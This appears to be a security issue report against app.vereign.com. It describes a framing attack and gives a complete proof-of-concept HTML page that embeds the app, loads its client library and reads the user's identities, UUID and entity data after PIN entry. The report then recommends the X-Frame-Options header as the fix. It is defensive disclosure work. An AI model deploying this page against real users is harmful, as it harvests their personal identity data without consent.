Hacker can create some site with app.vereign.com in iframe and get user data in case user enters the pincode

Example:

The fake.html code is:

<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="robots" content="noindex">
    <style>
        html, body {
            height: 100%;
        }
        body {
            margin: 0;
            padding: 0;
            overflow: hidden;
        }
        iframe {
        	display: none;
            width: 100%;
            height: 100%;
        }
    </style>
</head>
<body>
	<script src="https://app.vereign.com/vcl/js/client"></script>
    <script>
      window.setupViamAPI(
        "hackDiv",
        {
          onEvent: () => {}
        },
        "https://app.vereign.com/vcl/js/iframe",
        "https://app.vereign.com/api/",
        "https://app.vereign.com/wopi/",
        "https://app.vereign.com"
      ).then(async function(lib) {
        window.lib = lib;
        console.log("Injected: Lib is initialized");

        var identities = await lib.listIdentities();
        console.log("Injected: User identities: ", identities);

        var currentUUID = await lib.getCurrentlyLoggedInUUID();
        console.log("Injected: Current UUID: ", currentUUID.data);

        var entity = await lib.entityGetEntity(currentUUID.data);
        console.log("Injected: Current entity: ", entity);
        setInterval(async function() {
			var entity = await lib.entityGetEntity(currentUUID.data);
        	console.log("Injected: Current entity: ", entity);
        }, 5000);
      });
    </script>
    <div id="hackDiv"></div>

	<iframe style="display: block;" src="https://app.vereign.com"></iframe>
</body>
</html>

Solution:

Add a special HTTP header to the app.vereign.com, so we deny to open app.vereign.com in iframe X-Frame-Options: sameorigin

Edited Apr 15, 2020 by Alexey Lunin